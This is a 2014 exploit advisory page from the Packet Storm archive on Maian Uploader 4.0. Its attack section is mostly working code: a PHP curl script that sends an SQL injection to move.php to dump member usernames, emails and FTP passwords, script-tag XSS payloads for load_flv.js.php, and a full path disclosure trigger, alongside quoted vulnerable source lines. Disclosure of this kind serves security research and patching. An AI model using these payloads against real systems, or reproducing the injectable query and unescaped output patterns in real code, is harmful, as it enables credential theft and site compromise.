what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Maian Uploader 4.0 XSS / SQL Injection / Disclosure

Maian Uploader 4.0 XSS / SQL Injection / Disclosure
Posted Jan 24, 2014
Authored by KedAns-Dz

Maian Uploader version 4.0 suffers from cross site scripting, path disclosure, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | d7a6ac8750185aaa81fb74d38aa9efff8e895ffa86f098558cdede3976bf83ff

Maian Uploader 4.0 XSS / SQL Injection / Disclosure

Change Mirror Download
 
###########################################
#-----------------------------------------#
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
#-----------------------------------------#
# *----------------------------* #
# K |....##...##..####...####....| . #
# h |....#...#........#..#...#...| A #
# a |....#..#.........#..#....#..| N #
# l |....###........##...#.....#.| S #
# E |....#.#..........#..#....#..| e #
# D |....#..#.........#..#...#...| u #
# . |....##..##...####...####....| r #
# *----------------------------* #
#-----------------------------------------#
#[ Copyright © 2014 | Dz Offenders Cr3w ]#
#-----------------------------------------#
###########################################
# >> D_x . Made In Algeria . x_Z << #
######################################################################
#
# [>] Title : Maian Uploader v4.0 <= (SQLi/Disclosure/XSS) Vulnerabilities
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : SQL Injection , Cross-Site Scripting , Full Path Disclosure
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [>] ^_^ Greetings to 1337day Users/FAN's <3 *_* , i'm leaving 1337day
# [-] F-ck Hacking , LuV Exploiting .. Penetration-Testing rouls
#
######################################################################
#
# [!] Description :
#
# Maian Uploader v4.0 is suffer from multiple vulnerabilities
# remote attacker can exploit some bugs like SQL Injection , XSS
# and disclosure the target full path.
#
# [!] CWE = CWE-89 , CWE-22 , CWE-352
#
####
#
# [+] Exploit (1) ' SQL Injection ' =>
#
# <?php
#
# /*
#
# - move.php (lines: 90 > 92 )
# $q_acc = mysql_query("SELECT id,username FROM ".$database['prefix']."members
# WHERE id != '".$_POST['id']."'
# ORDER BY accname") or die(mysql_error());
#
# */
#
# $sqli = "SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,ftp_user,0x3a,ftp_pass SEPARATOR 0x2c20) FROM mu_members";
#
# $ch = curl_init();
# curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
# curl_setopt($ch, CURLOPT_URL, "http://[target]/[path]/admin/data_files/move.php");
# curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
# curl_setopt($ch, CURLOPT_POST, 1);
# curl_setopt($ch, CURLOPT_POSTFIELDS, "id=$sqli");
# $exploit = curl_exec ($ch);
# curl_close($ch);
# unset($ch);
# echo $exploit;
# ?>
#
####
#
# [+] Exploit (2) ' XSRF/XSS ' =>
#
# - load_flv.js.php ( line : 25 )
# document.write('<object type="application/x-shockwave-flash" .....
# width="<?php echo $_GET['width']; ?>"
# height="<?php echo $_GET['height']; ?>
#
# XSS : "><h1>XsS by KedAns-Dz</h1>
# XSS : "><script>Alert('XsS by KedAns-Dz');</script>
#
# http://127.0.0.1/uploader/admin/js/load_flv.js.php?width=[ XSS ]
# http://127.0.0.1/uploader/js/load_flv.js.php?width=[ XSS ]
#
# [&] Exploit (3) ' Full Path Disclosure ' =>
#
# don't put ( &height= ) after width Xss and you get error
# Notice about ( Undefined index: height ) with the Full Path Dir.
#
######################################################################

####
# <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# Greetings to my Homies : Indoushka , Caddy-Dz , Kalashinkov3 ,
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &
# =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=
####
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close